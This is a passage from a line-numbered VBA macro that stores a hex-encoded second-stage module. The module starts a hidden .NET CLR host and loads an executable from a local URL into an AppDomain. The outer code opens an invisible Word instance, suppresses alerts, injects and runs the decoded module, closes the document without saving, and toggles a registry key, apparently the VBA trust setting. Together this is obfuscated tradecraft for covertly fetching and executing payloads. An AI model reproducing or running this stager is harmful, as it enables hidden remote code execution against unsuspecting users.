"57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b5c76322e302e353037" 49 | stg1 = stg1 & "32375c6d73636f726c69622e746c62220d0a202020200d0a2020202043616c6c20537467320d0a0d" 50 | stg1 = stg1 & "0a456e64205375620d0a0d0a537562205374673228290d0a0d0a2020202044696d2075726c0d0a20" 51 | stg1 = stg1 & "20202075726c203d2022687474703a2f2f3132372e302e302e313a383138302f48656c6c6f576f72" 52 | stg1 = stg1 & "6c642e657865220d0a202020200d0a0d0a2020202044696d20494352486f7374204173204e657720" 53 | stg1 = stg1 & "6d73636f7265652e436f7252756e74696d65486f73740d0a2020202044696d2049446f6d61696e20" 54 | stg1 = stg1 & "417320417070446f6d61696e0d0a20202020494352486f73742e53746172740d0a20202020494352" 55 | stg1 = stg1 & "486f73742e47657444656661756c74446f6d61696e2049446f6d61696e0d0a200d0a202020204469" 56 | stg1 = stg1 & "6d207072677674283020546f20312920417320496e74656765720d0a2020202044696d2070726770" 57 | stg1 = stg1 & "76617267283020546f203129204173204c6f6e675074720d0a202020200d0a202020207072677674" 58 | stg1 = stg1 & "283029203d205661725479706528435661722875726c29290d0a2020202070726770766172672830" 59 | stg1 = stg1 & "29203d205661725074722875726c290d0a0d0a2020202044696d206f75743a206f7574203d20300d" 60 | stg1 = stg1 & "0a2020202044696d207265742041732056617269616e740d0a202020200d0a202020207072677674" 61 | stg1 = stg1 & "283129203d20566172547970652843566172286f757429290d0a2020202070726770766172672831" 62 | stg1 = stg1 & "29203d20566172507472286f7574290d0a202020200d0a202020200d0a2020202044696d20687220" 63 | stg1 = stg1 & "4173204c6f6e670d0a202020206872203d204469737043616c6c46756e63284f626a507472284944" 64 | stg1 = stg1 & "6f6d61696e292c203531202a204c656e287072677076617267283029292c20342c2076624c6f6e67" 65 | stg1 = stg1 & "2c20322c2070726776742830292c2070726770766172672830292c20726574290d0a202020200d0a" 66 | stg1 = stg1 & "456e64205375620d0a0d0a0d0a" 67 | 68 | Dim stg1dec As String 69 | stg1dec = HexDecode(stg1) 70 | 71 | wordObj.Visible = False 72 | wordObj.DisplayAlerts = False 73 | ModuleObj.codeModule.AddFromString (stg1dec) 74 | wordObj.Application.Run ("TestModule.Stg1") 75 | wordObj.ActiveDocument.Close (False) 76 | 'wordObj.Documents(1).Close (False) 77 | 78 | SetRegKey (0) 79 | 80 | 81 | End Sub 82 | --------------------------------------------------------------------------------